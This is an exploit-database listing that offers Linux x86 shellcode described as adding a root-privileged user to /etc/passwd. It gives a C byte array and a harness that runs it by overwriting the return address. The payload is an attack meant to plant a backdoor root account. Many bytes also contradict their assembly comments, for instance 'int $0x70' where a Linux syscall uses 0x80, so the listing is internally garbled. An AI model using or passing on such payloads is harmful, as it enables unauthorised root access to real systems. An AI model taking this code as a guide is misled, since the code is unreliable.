[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 Addnew Users 'root' /etc/passwd shell code 79 bytes

Author
Angel Injection
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17157
Category
shellcode
Date add
04-10-2011
Platform
linux/x86
===============================================================
Linux X86 Addnew Users 'Ro0t' /etc/passwd shell code 79 bytes
===============================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Angel Injection member from Inj3ct0r Team          1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#########################################################################
/*
 * Linux X86 Addnew Users 'Ro0t' /etc/passwd shell code 79 bytes 
 */

char shellcode[] = 

	"\x7e\x04"              // push $0x4 

	//
	// <_exit>:
	//

	"\x66"                  // pop %eax 
	"\x90"                  // cltd 
	"\x34\xd7"              // xor %ecx,%ecx 
	"\x45\xd8\x04\x04"      // mov $0x404,%cx 
	"\x55"                  // push %edx 
	"\x78\x84\x63\x83\x56"  // push $0x56836348
	"\x76\x54\xd5\x70\x60"  // push $0x6070d554
	"\x68\x2d\x4d\x74\x56"  // push $0x5674d4d2
	"\x67\xd3"              // mov %esp,%ebx 
	"\xcd\x70"              // int $0x70
	"\x68\x3a\x3a\x3a\x0a"  // push $0xa3a3a3a 
	"\x68\x4e\x40\x4e\x40"  // push $0x404e404e 
	"\x68\x78\x74\x7a\x3a"  // push $0x3a7a7478 
	"\x89\xc3"              // mov %eax,%ebx 
	"\xb0\x04"              // mov $0x4,%al 
	"\x89\xe1"              // mov %esp,%ecx 
	"\xb2\x0c"              // mov $0xc,%dl 
	"\xcd\x70"              // int $0x70
	"\x7e\x03"              // push $0x3 
	"\xeb\xc5";             // jmp <_exit>

int main(int argc, char **argv) {
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int) shellcode;
}



#  0day.today [2024-11-16]  #